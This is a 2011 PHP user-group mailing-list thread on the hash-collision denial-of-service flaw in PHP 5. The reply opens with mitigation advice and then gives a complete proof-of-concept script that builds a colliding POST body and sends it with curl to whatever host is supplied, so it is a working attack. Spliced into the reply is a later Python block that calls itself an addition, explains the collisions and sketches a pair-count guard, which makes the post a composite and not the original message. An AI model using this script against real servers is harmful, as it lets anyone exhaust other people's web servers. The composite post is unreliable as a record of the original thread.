[nycphp-talk] Hash Table Vulnerability in PHP5
Ben Sgro
ben at projectskyline.com
Thu Dec 29 11:33:20 EST 2011
Hey,
Don't allow posts w/> ~100 k/v pairs. Don't allow larger uploads than is necessary. As you mentioned, I guess limit script execution time.
Right now, there are some Snort signatures going around (not sure if you run IDS, etc). I've also heard people mention a mod_rewrite regex
to strip out these bad chars.
I have a PoC here you can test against your servers: (And here also: http://koto.github.com/blog-kotowicz-net-examples/hashcollision/kill.html)
<?php
// v--- ripped from: https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
//
// generate POST of Doom
function doom() {
    // entries with collisions in PHP hashtable hash function
    $a = array(
        '0' => 'Ez',
        '1' => 'FY',
        '2' => 'G8',
        '3' => 'H' . chr(23),
        '4' => 'D' . chr(122 + 33),
    );
    // how long should the payload be
    $length = 7;
    $size = count($a);
    $post = '';
    $max = pow($size, $length);
    for ($i = 0; $i < $max; $i++) {
        $s = str_pad(base_convert($i, 10, $size), $length, '0', STR_PAD_LEFT);
        $post .= '' . (urlencode(strtr($s, $a))) . '=&';
    }
    return $post;
}
// hashcollider.php
// by sk
$post = doom();
$ch = curl_init();
$args = getopt("h:");
$host = $args['h'];
curl_setopt($ch, CURLOPT_URL, $host);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
printf("[x] Target: %s\n", $host);
printf("[x] CPU spike!\n");
$result = curl_exec($ch);
printf("[x] Payload sent.\n");
Good luck!
- Ben
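Why a cap on the number of pairs is the right lever: every key the PoC above builds hashes to the same DJBX33A value, so PHP 5 walks a single bucket chain on each insert and the cost grows with the square of the pair count. As an added example (not from Ben's post or the kotowicz repository), the Python below re-implements PHP 5's string hash, checks that the five fragments and any key assembled from them collide, counts the worst-case comparisons a pair limit bounds, and counts pairs in a raw body the way a pre-parse "~100 pairs" guard would; all names and the sample body are constructed here.

```python
from itertools import product

MASK64 = (1 << 64) - 1  # zend_inline_hash_func accumulates in an unsigned long


def djbx33a(key: bytes) -> int:
    """PHP 5 string hash: h = h*33 + c, seeded with 5381 (DJBX33A)."""
    h = 5381
    for c in key:
        h = (h * 33 + c) & MASK64
    return h


# The five two-byte fragments used by the PoC; each has 33*c1 + c2 == 2399.
FRAGMENTS = [b"Ez", b"FY", b"G8", b"H" + bytes([23]), b"D" + bytes([122 + 33])]


def fragments_collide(frags=FRAGMENTS) -> bool:
    """True when every fragment hashes to the same value."""
    return len({djbx33a(f) for f in frags}) == 1


def colliding_keys(length: int, frags=FRAGMENTS):
    """All keys made of `length` fragments. The hash is a polynomial in 33 and
    each fragment contributes the same term at a given position, so every
    key of the same length collides."""
    return [b"".join(p) for p in product(frags, repeat=length)]


def distinct_hashes(keys) -> int:
    """How many buckets a set of keys would actually spread over."""
    return len({djbx33a(k) for k in keys})


def bucket_comparisons(n: int) -> int:
    """Worst-case key comparisons when n keys share one bucket and the chain
    is walked on every insert: 0 + 1 + ... + (n - 1)."""
    return n * (n - 1) // 2


def pair_count(body: bytes) -> int:
    """Count key=value pairs in a raw urlencoded body without building a
    dict; a guard like this has to run before the hash table is filled."""
    return sum(1 for part in body.split(b"&") if part)


def over_pair_limit(body: bytes, limit: int = 100) -> bool:
    """The '~100 k/v pairs' check from the post, applied to a raw body."""
    return pair_count(body) > limit
```

Note that a check inside a PHP script runs after $_POST has already been built, so a pair-count guard only helps if it sits in front of the parser (web server, proxy, or the interpreter's own limit).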
On Dec 29, 2011, at 11:19 AM, Hans C. Kaspersetz wrote:
> Good morning,
>
> I hope everyone has seen the news about the Hash Table Vulnerability in lots of web scripting languages. You can read about it here: http://www.securityweek.com/hash-table-collision-attacks-could-trigger-ddos-massive-scale or here http://www.kb.cert.org/vuls/id/903934.
>
> It looks like PHP has addressed the issue (http://www.php.net/archive/2011.php#id2011-12-25-1) by providing a max var directive in the latest RC5 for 5.4.0. However, with all release candidates they are strongly advising against using it in production.
>
> What is the general consensus for mitigating this risk without moving to RC5?
>
> We are limiting the execution time of our scripts, however for upload scripts or processing intensive scripts we need to increase the execution time which I imagine would leave those scripts more vulnerable.
>
> Thanks,
> Hans Kaspersetz
> Cyber X Designs
> http://cyberxdesigns.com
>
> _______________________________________________
> New York PHP Users Group Community Talk Mailing List
> http://lists.nyphp.org/mailman/listinfo/talk